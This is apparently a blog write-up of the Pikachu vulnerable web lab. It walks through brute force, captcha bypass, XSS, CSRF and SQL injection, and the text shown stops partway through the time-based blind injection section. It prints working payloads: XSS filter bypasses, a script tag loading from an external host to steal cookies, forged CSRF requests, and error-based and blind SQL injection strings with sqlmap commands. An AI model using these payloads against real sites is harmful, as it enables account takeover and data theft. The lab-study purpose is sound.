<id>https://myprefer.github.io/post/Pikachu%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%93%8D.html</id>
<published>2024-02-04T01:57:16.000Z</published>
<updated>2024-04-21T12:46:40.163Z</updated>
<content type="html"><![CDATA[<h1 id="Pikachu靶场实操"><a href="#Pikachu靶场实操" class="headerlink" title="Pikachu靶场实操"></a>Pikachu靶场实操</h1><h2 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>连续性尝试+字典+自动化</p><h4 id="字典"><a href="#字典" class="headerlink" title="字典"></a>字典</h4><ul><li>常用的账号密码</li><li>社工库</li><li>算法生成</li></ul><h4 id="暴力破解漏洞"><a href="#暴力破解漏洞" class="headerlink" title="暴力破解漏洞"></a>暴力破解漏洞</h4><ul><li>是否要求复杂密码</li><li>是否使用安全的验证码</li><li>是否进行次数限制</li><li>是否采用双元素认证</li></ul><h4 id="验证码"><a href="#验证码" class="headerlink" title="验证码"></a>验证码</h4><ul><li>防止登录暴力破解</li><li>防止机器恶意注册</li></ul><h4 id="测试流程"><a href="#测试流程" class="headerlink" title="测试流程"></a>测试流程</h4><ul><li>确认登录接口的脆弱性<ul><li>比如:尝试登录–抓包–观察验证元素和response信息</li></ul></li><li>对字典进行优化<ul><li>根据注册提示信息进行优化</li><li>管理员</li></ul></li><li>工具自动化操作</li></ul><h3 id="Pikachu关卡"><a href="#Pikachu关卡" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="基于表单的暴力破解"><a href="#基于表单的暴力破解" class="headerlink" title="基于表单的暴力破解"></a>基于表单的暴力破解</h4><p>此关没有设置验证码等防范措施, 使用Brup Suite的Intruder功能, 如果response中没有<code>username or password is not exists</code>可以说明破解成功</p><p>步骤:</p><ol><li>尝试手动提交表单, 使用brupsuite拦截<br><img src="https://i0.imgs.ovh/2024/02/03/bSOeR.png"></li><li>发送到Intruder, 关闭拦截, 配置好payload和字典, 开始进行破解(Cluster bomb)</li><li>对结果按照长度或有无<code>username or password is not exists</code>进行整理, 发现test/abc123和admin/123456可能是正确的, 验证后,可以确认破解成功<br><img src="https://i0.imgs.ovh/2024/02/03/bSdpW.png"></li></ol><h4 id="验证码绕过-on-server"><a href="#验证码绕过-on-server" class="headerlink" title="验证码绕过(on server)"></a>验证码绕过(on server)</h4><p>验证码在后端会进行验证, 但是验证码可以被重复利用, 因此可以手动输入正确的验证码, 然后一直利用该验证码进行破解, 其余操作同上</p><p><img src="https://i0.imgs.ovh/2024/02/03/bSD8e.png"></p><ul><li><em>原因: php中 session默认的过期时间为1440秒, 后端没有对此进行设置, 因此这段时间内验证码可以一直用</em></li></ul><h4 id="验证码绕过-on-client"><a href="#验证码绕过-on-client" class="headerlink" title="验证码绕过(on 
client)"></a>验证码绕过(on client)</h4><p>验证码只能在前端限制客户端发包, 非常容易解除, 没有很好的验证效果, 其余操作同上</p><h4 id="token防爆破"><a href="#token防爆破" class="headerlink" title="token防爆破"></a>token防爆破</h4><p>由于token已经出现在前端代码中, 因此我们可以轻易获取, 我先猜测用户名为admin, 然后通过音叉模式结合字典和从响应中获取的token进行暴破</p><p><img src="https://i0.imgs.ovh/2024/02/03/buV7s.png"></p><h2 id="XSS跨站脚本"><a href="#XSS跨站脚本" class="headerlink" title="XSS跨站脚本"></a>XSS跨站脚本</h2><h3 id="概述-1"><a href="#概述-1" class="headerlink" title="概述"></a>概述</h3><h4 id="测试流程-1"><a href="#测试流程-1" class="headerlink" title="测试流程"></a>测试流程</h4><ol><li>在目标站点上找到输入点, 比如查询接口, 留言板等</li><li>输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理</li><li>通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合);</li><li>提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;</li></ol><h4 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h4><ol><li>一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS</li><li>由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器);</li><li>通过变化不同的script,尝试绕过后台过滤机制;</li></ol><h4 id="反射型xss-GET与POST"><a href="#反射型xss-GET与POST" class="headerlink" title="反射型xss(GET与POST)"></a>反射型xss(GET与POST)</h4><ul><li>GET型可以用伪装后的url, 更容易攻击</li></ul><h4 id="XSS绕过"><a href="#XSS绕过" class="headerlink" title="XSS绕过"></a>XSS绕过</h4><ul><li>转换<ul><li>大小写<code><ScRipT></code></li><li>拼凑<code><scr<script>ipt></code></li><li>注释<code><sc<!--a-->ript></code></li></ul></li><li>编码<ul><li>url编码</li><li>html编码</li></ul></li></ul><h4 id="htmlspecialchars-函数"><a href="#htmlspecialchars-函数" class="headerlink" title="htmlspecialchars()函数"></a>htmlspecialchars()函数</h4><p>htmlspecialchars()函数把预定义的字符转换为HTML实体。</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 
16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>&(和号)成为&amp<br>“(双引号)成为&quot<br>‘(单引号)成为&#039<br><(小于)成为&lt<br>‘>’(大于)成为&gt</p></blockquote><h3 id="Pikachu关卡-1"><a href="#Pikachu关卡-1" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="反射型xss-get"><a href="#反射型xss-get" class="headerlink" title="反射型xss(get)"></a>反射型xss(get)</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">.="</span><span style="color: #C3E88D"><p class='notice'>who is </span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">_GET</span><span style="color: 
#89DDFF">['</span><span style="color: #C3E88D">message</span><span style="color: #89DDFF">']}</span><span style="color: #C3E88D">,i don't care!</p></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span></code></pre></div><p>源码没有对message进行任何检查和过滤</p><p>解除前端输入限制后输入<code></p><script>alert();</script><p></code>即可</p><p><img src="https://i0.imgs.ovh/2024/02/03/bxp1J.png"></p><h4 id="反射型xss-post"><a href="#反射型xss-post" class="headerlink" title="反射型xss(post)"></a>反射型xss(post)</h4><p>一次性,会与服务端交互,输入<code></p><sCRiPt sRC=//uj.ci/pq7></sCrIpT><p></code>成功打到cookie<br><img src="https://i0.imgs.ovh/2024/02/03/bxwvW.png"></p><h4 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h4><p>同样没有检查和过滤, 每次刷新都会加载一遍, 输入同上<br><img src="https://i0.imgs.ovh/2024/02/03/bxsBo.png"></p><h4 id="DOM型xss"><a href="#DOM型xss" class="headerlink" title="DOM型xss"></a>DOM型xss</h4><p>输入的内容会被填入超链接<br>输入<code>' onclick='alert()</code>然后点击超链接链接:<br><img src="https://i0.imgs.ovh/2024/02/03/bxKv5.png"></p><h4 id="DOM型xss-x"><a href="#DOM型xss-x" class="headerlink" title="DOM型xss-x"></a>DOM型xss-x</h4><p>输入内容同上, 点击第二个出现的超链接运行, 类似于get反射型xss, 可以通过url攻击<br><img src="https://i0.imgs.ovh/2024/02/03/bx1yp.png"></p><h4 id="xss之盲打"><a href="#xss之盲打" class="headerlink" title="xss之盲打"></a>xss之盲打</h4><p>我留言的内容在后台显示到管理员界面, 因此输入<code></td><script>alert();</script><td></code>, 管理员进入后台后就会被弹窗<br><img src="https://i0.imgs.ovh/2024/02/03/bx5oK.png"></p><h4 id="xss之过滤"><a href="#xss之过滤" class="headerlink" title="xss之过滤"></a>xss之过滤</h4><p><code><script</code>会被过滤掉, 但是换成大写就不会, 比如<code><ScriPt>alert();</SCripT></code><br><img src="https://i0.imgs.ovh/2024/02/03/bxYY2.png" alt="https://i0.imgs.ovh/2024/02/03/bxYY2.png"></p><h4 id="xss之htmlspecialchars"><a href="#xss之htmlspecialchars" class="headerlink" title="xss之htmlspecialchars"></a>xss之htmlspecialchars</h4><p>单引号<code>'</code>没有被处理, 因此可以输入<code>#' onclick=alert();'</code><br><img 
src="https://i0.imgs.ovh/2024/02/04/beYBl.png"></p><h4 id="xss之herf输出"><a href="#xss之herf输出" class="headerlink" title="xss之herf输出"></a>xss之herf输出</h4><p>这关没有在后端限制只能输入url因此可以填入js代码<code>javascript:alert()</code><br><img src="https://i0.imgs.ovh/2024/02/04/bed1d.png"></p><h4 id="xss之js输出"><a href="#xss之js输出" class="headerlink" title="xss之js输出"></a>xss之js输出</h4><p>关于输入的源码如下:</p><div class="language-html"><button title="Copy code" class="copy"></button><span class="lang">html</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">script</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #BABED8"> $ms</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">432</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8">($ms</span><span style="color: #89DDFF">.</span><span style="color: #BABED8">length </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #BABED8">)</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #F07178">(</span><span style="color: #BABED8">$ms</span><span style="color: #F07178"> </span><span style="color: #89DDFF">==</span><span style="color: #F07178"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmac</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #82AAFF">$</span><span 
style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">#fromjs</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">text</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmac确实厉害,看那小眼神..</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #F07178"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #676E95; font-style: italic">// alert($ms);</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #82AAFF">$</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">#fromjs</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">text</span><span style="color: #F07178">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">无论如何不要放弃心中所爱..</span><span style="color: #89DDFF">'</span><span style="color: #F07178">)</span></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #F07178"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF"></</span><span style="color: #F07178">script</span><span style="color: #89DDFF">></span></span></code></pre></div><p>可以在<code>$ms='432'</code>构造闭合, 输入<code>tmac'</script><script>alert();</script></code><br><img src="https://i0.imgs.ovh/2024/02/04/beEf2.png"></p><h2 id="CSRF-跨站请求伪造"><a href="#CSRF-跨站请求伪造" class="headerlink" 
title="CSRF(跨站请求伪造)"></a>CSRF(跨站请求伪造)</h2><h3 id="概述-2"><a href="#概述-2" class="headerlink" title="概述"></a>概述</h3><ul><li>通过伪装来自受信任用户的请求来利用受信任的网站</li></ul><h4 id="与XSS的区别"><a href="#与XSS的区别" class="headerlink" title="与XSS的区别"></a>与XSS的区别</h4><ul><li>XSS可以拿到用户的权限(盗取cookie), 然后实施破坏</li><li>CSRF借用户的权限进行攻击, 而没有拿到用户的权限</li></ul><h4 id="确认是否存在CSRF漏洞"><a href="#确认是否存在CSRF漏洞" class="headerlink" title="确认是否存在CSRF漏洞"></a>确认是否存在CSRF漏洞</h4><ul><li>判断请求是否可以被伪造</li><li>确认凭证的有效期</li></ul><h4 id="Token如何防止CDRF"><a href="#Token如何防止CDRF" class="headerlink" title="Token如何防止CDRF"></a>Token如何防止CDRF</h4><ul><li>每次请求增加一个随机码, 后台每次对次进行验证</li></ul><h3 id="Pikachu关卡-2"><a href="#Pikachu关卡-2" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="CSRF-get"><a href="#CSRF-get" class="headerlink" title="CSRF(get)"></a>CSRF(get)</h4><ul><li><p>假设攻击者是Allen, 可以得到修改信息提交表单时的url为<code>http://192.168.1.9:7071/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=13676767767&add=nba+767&email=allen%40pikachu.com&submit=submit</code></p></li><li><p>假设攻击目标是vince, 已知他目前的个人信息为:</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" 
stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>姓名:vince</p><p>性别:boy</p><p>手机:18626545453</p><p>住址:chain</p><p>邮箱:<a href="mailto:vince@pikachu.com">vince@pikachu.com</a></p></blockquote></li><li><p>要把他的个人信息中的地址修改为<code>moon</code>, 那么可以伪造一个链接<code>http://192.168.1.9:7071/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=moon&email=vince%40pikachu.com&submit=submit</code></p></li><li><p>让vince点击这个链接, 就可以利用vince的权限, 向web发出请求, 修改个人信息<br><img src="https://i0.imgs.ovh/2024/02/04/bgpJU.png"></p></li></ul><h4 id="CSRF-post"><a href="#CSRF-post" class="headerlink" title="CSRF(post)"></a>CSRF(post)</h4><ul><li>post请求中, 表单不在url中, 而在请求体中, 这时可以伪造一个站点, 让vince给伪造站点发出请求, 把请求中的参数进行修改, 向真正的站点提交post请求</li><li>在伪造站点(钓鱼网站)中, 我在表单添加一个action, 让表单提交到真正的网站上<code><form actiom="http://192.168.1.9:7071/vul/csrf/csrfpost/csrf_post_edit.php" method="post"></code></li><li>在vince点击提交时, 将vince的信息进行修改, 即可达成目的<br><img src="https://i0.imgs.ovh/2024/02/04/bgpJU.png"></li></ul><h4 id="CSRF-Token"><a href="#CSRF-Token" class="headerlink" title="CSRF Token"></a>CSRF Token</h4><h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><h3 id="概述-3"><a href="#概述-3" class="headerlink" title="概述"></a>概述</h3><ul><li><p>攻击者可以通过合法输入点提交一些精心构造的语句, 从而欺骗后台数据库对其进行执行, 导致数据库信息泄露</p></li><li><p>例如:<br>正常输入: <code>1</code>, 执行<code>select 
password from users where id=1</code><br>非法输入:<code>1 or 1=1</code>, 执行<code>select password from users where id=1 or 1=1;</code><br>后者会输出表中的所有password</p></li></ul><h4 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h4><ol><li><p>注入点探测(自动/手动)</p><ul><li>判断注入点类型</li><li>判断查询列数</li><li>判断显示位置</li></ul></li><li><p>信息获取</p><ul><li><p>获取所有数据库名</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 
11.5Z"></path></svg></span><p>Show everything at once: group_concat(column)</p><p>Show one row at a time: limit</p></blockquote></li><li><p>Get all table names in a database</p></li><li><p>Get all column names in a table</p></li><li><p>Get the data in those columns</p></li></ul></li><li><p>Obtain privileges</p></li></ol><h4 id="注入点类型"><a href="#注入点类型" class="headerlink" title="注入点类型"></a>Injection point types</h4><ul><li>Numeric</li><li>String: <code>'xxx'</code></li><li>Search: <code>%xxx%</code></li></ul><p><em>Close the original literal according to its type before appending the payload</em></p><h4 id="基于union联合查询的信息获取"><a href="#基于union联合查询的信息获取" class="headerlink" title="基于union联合查询的信息获取"></a>Retrieving information with UNION</h4><ul><li>Both SELECTs must return the same number of columns</li></ul><h4 id="判断查询列数"><a href="#判断查询列数" class="headerlink" title="判断查询列数"></a>Determining the number of columns</h4><ul><li>order by: sorts by the given column position; <code>order by n</code> errors as soon as n exceeds the number of columns, so the largest n that still works is the column count</li></ul><h4 id="基于报错信息获取"><a href="#基于报错信息获取" class="headerlink" title="基于报错信息获取"></a>Error-based retrieval</h4><ul><li>Call functions that are guaranteed to raise an error and smuggle the wanted value into the error message</li><li>Precondition: the backend does not suppress database errors, so a failing statement is echoed to the frontend</li></ul><h5 id="报错函数"><a href="#报错函数" class="headerlink" title="报错函数"></a>Error functions</h5><ul><li><p><code>updatexml()</code></p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">updatexml(xml_document, XPathstring, new_value)</span></span><span class="line"><span style="color: #BABED8">#first argument: a column name (string)</span></span><span class="line"><span style="color: #BABED8">#second argument: an XPath string</span></span><span class="line"><span style="color: #BABED8">#third argument: string that replaces the matched node</span></span></code></pre></div><p><strong>"The XPath expression must be valid, otherwise an error is raised"</strong>, which is what makes the function usable for error-based injection</p><p>For example <code>updatexml(1,concat(0x7e,database()),0)</code> fails because <code>0x7e</code> (<code>~</code>) makes the XPath invalid, and the error message quotes the result of <code>database()</code>; the message is truncated to 32 characters, so long values are read in pieces with <code>substr()</code></p></li><li><p><code>extractvalue()</code></p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">extractvalue(xml_document, xpath_string)</span></span><span class="line"><span style="color: #BABED8">#raises the error through an invalid XPath in the same way</span></span></code></pre></div></li><li><p><code>floor()</code><br>Rounding function; example:</p><div class="language-sql"><button title="Copy code" class="copy"></button><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">xxx</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"> and (select 2 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#</span></span></code></pre></div><p>The subquery groups on the key <code>concat(user(),floor(rand(0)*2))</code>; because <code>rand(0)</code> is evaluated again when the key is inserted into the temporary group table, the same key is inserted twice and MySQL reports "Duplicate entry ... for key", with the output of <code>user()</code> embedded in the message</p></li></ul><h4 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>Blind injection</h4><ul><li>The backend hides error messages, so errors cannot be used to confirm or exploit the injection</li><li>Types<ul><li>Boolean-based, e.g. <code>vince' and ascii(substr(database(),1,1))=112#</code></li><li>Time-based, e.g. <code>vince' and if((ascii(substr(database(),1,1)))=112,sleep(5),null)#</code></li></ul></li><li>Both test one character at a time with <code>ascii(substr((query), n, 1))=x</code>, where n is the character position and x the guessed ASCII code</li></ul><h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>Wide-byte injection</h4><h3 id="Pikachu关卡-3"><a href="#Pikachu关卡-3" class="headerlink" title="Pikachu关卡"></a>Pikachu levels</h3><h4 id="数字型注入-post"><a href="#数字型注入-post" class="headerlink" title="数字型注入(post)"></a>Numeric injection (POST)</h4><ul><li><p>The form limits the input on the client side, but that is trivially removed, e.g. by intercepting the request and editing it; below the submitted <code>1</code> is changed to <code>1 or 1=1</code><br><img src="https://i0.imgs.ovh/2024/02/04/btJxp.png"></p></li><li><p>After submitting, every user is returned<br><img src="https://i0.imgs.ovh/2024/02/04/btziT.png"></p></li></ul><h4 id="字符型注入-get"><a href="#字符型注入-get" class="headerlink" title="字符型注入(get)"></a>String injection (GET)</h4><ul><li><p>Just close the literal: first probe the site with special characters such as <code>'</code>, <code>"</code> or <code>%</code>; below is the response to a single quote <code>'</code><br><img src="https://i0.imgs.ovh/2024/02/04/btjkl.png"></p></li><li><p>The error shows that the backend wraps the value in single quotes, so a single quote closes it; <code>' or 1=1;#</code> likewise returns every user, the <code>#</code> commenting out the rest of the statement so the server's own trailing quote causes no error</p></li></ul><h4 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a>Search injection</h4><ul><li><p>Testing shows that <code>%'</code> closes the literal; <code>#%' or 1=1 order by 3;#</code> renders normally while <code>#%' or 1=1 order by 4;#</code> errors, so the query has three columns</p></li><li><p><code>#%' and id=1 union select user(),database(),version();#</code> returns some database information</p><p><img src="https://i0.imgs.ovh/2024/02/05/bJMIW.png"></p></li></ul><h4 id="xx型注入"><a href="#xx型注入" class="headerlink" title="xx型注入"></a>xx-type injection</h4><ul><li><p>Input <code>'</code>:<br><img src="https://i0.imgs.ovh/2024/02/05/bJsI5.png"></p></li><li><p>The error message shows that the literal is wrapped as <code>('xx')</code>, so the payload must close both the quote and the parenthesis<br><img src="https://i0.imgs.ovh/2024/02/05/bJwye.png"></p></li></ul><h4 id="“insert-update”注入"><a href="#“insert-update”注入" class="headerlink" title="“insert/update”注入"></a>"insert/update" injection</h4><ul><li><p><strong>insert</strong></p><ul><li><p>Normally there is no output, but information can still be obtained through an error</p></li><li><p>payload: <code>xxx' or updatexml(1,concat(0x7e,user()),0) or '</code> reveals the database user:<br><img src="https://i0.imgs.ovh/2024/02/05/biomv.png"></p></li></ul></li><li><p><strong>update</strong></p><ul><li>Same payload as for insert</li></ul></li></ul><h4 id="“delete注入”"><a href="#“delete注入”" class="headerlink" title="“delete注入”"></a>"delete" injection</h4><ul><li><p>Analysis: the captured traffic shows that deleting a record sends a GET request carrying the numeric id of the row, so the backend presumably runs <code>delete from xxx where id=78</code><br><img src="https://i0.imgs.ovh/2024/02/06/b8o6o.png"></p></li><li><p>SQL such as <code>or updatexml(1,concat(0x7e,xxx),0) </code> can therefore be appended to the id to trigger an error and read data from it<br><img src="https://i0.imgs.ovh/2024/02/06/b8u95.png"><br><img src="https://i0.imgs.ovh/2024/02/06/b8OMs.png"></p></li></ul><h4 id="“http-header”注入"><a href="#“http-header”注入" class="headerlink" title="“http header”注入"></a>"http header" injection</h4><ul><li><p>The page shown after login displays request-header values, so the backend stores and processes them; a header is therefore a candidate injection point</p></li><li><p>Set the User-Agent header to <code>Firefox' or updatexml(1, concat(0x7e, database()) ,0) or '#</code><br><img src="https://i0.imgs.ovh/2024/02/06/b85uu.png"></p><p>Result<br><img src="https://i0.imgs.ovh/2024/02/06/b8Y8l.png"></p></li></ul><h4 
id="盲注-base-on-boolean"><a href="#盲注-base-on-boolean" class="headerlink" title="盲注(base on boolean)"></a>Blind injection (boolean-based)</h4><ul><li>The backend filters error messages, so nothing is echoed, but <code>vince' and 1=1#</code> shows<br><img src="https://i0.imgs.ovh/2024/02/07/bqWkO.png"></li><li>while <code>vince' and 1=2#</code> shows<br><img src="https://i0.imgs.ovh/2024/02/07/bqktH.png"></li><li>That difference is the oracle: when <code>vince' and ascii(substr(database(),1,1))=112#</code> produces the first page, the first character of the database name is <code>p</code>; repeating this for every position and every candidate value recovers the whole string</li><li>Doing this by hand is tedious, so use sqlmap<br>Current database: <code>py .\sqlmap.py -u "http://192.168.5.133:7090/vul/sqli/sqli_blind_b.php?name=1234&submit=%E6%9F%A5%E8%AF%A2" --current-db</code></li><li><img src="https://i0.imgs.ovh/2024/02/07/bq0ND.png"></li><li>The database name is <code>pikachu</code></li><li>More can be obtained the same way (<code>--dbs</code>, <code>-D pikachu --tables</code>, <code>--dump</code>)<br><img src="https://i0.imgs.ovh/2024/02/07/bqhOA.png"></li></ul><h4 id="盲注-base-on-time"><a href="#盲注-base-on-time" class="headerlink" title="盲注(base on time)"></a>Blind injection (time-based)</h4><ul><li>No output at all, and every input renders the same page, so the boolean technique cannot even tell whether the point is injectable</li><li>But <code>vince</code> loads in about 80 ms, while <code>vince' and sleep(5)#</code> really takes about 5 seconds<br><img src="https://i0.imgs.ovh/2024/02/07/bqsD5.png"></li><li>So sleep(5) was executed as SQL and the point is injectable; combining this with the boolean logic gives the payload <code>vince' and 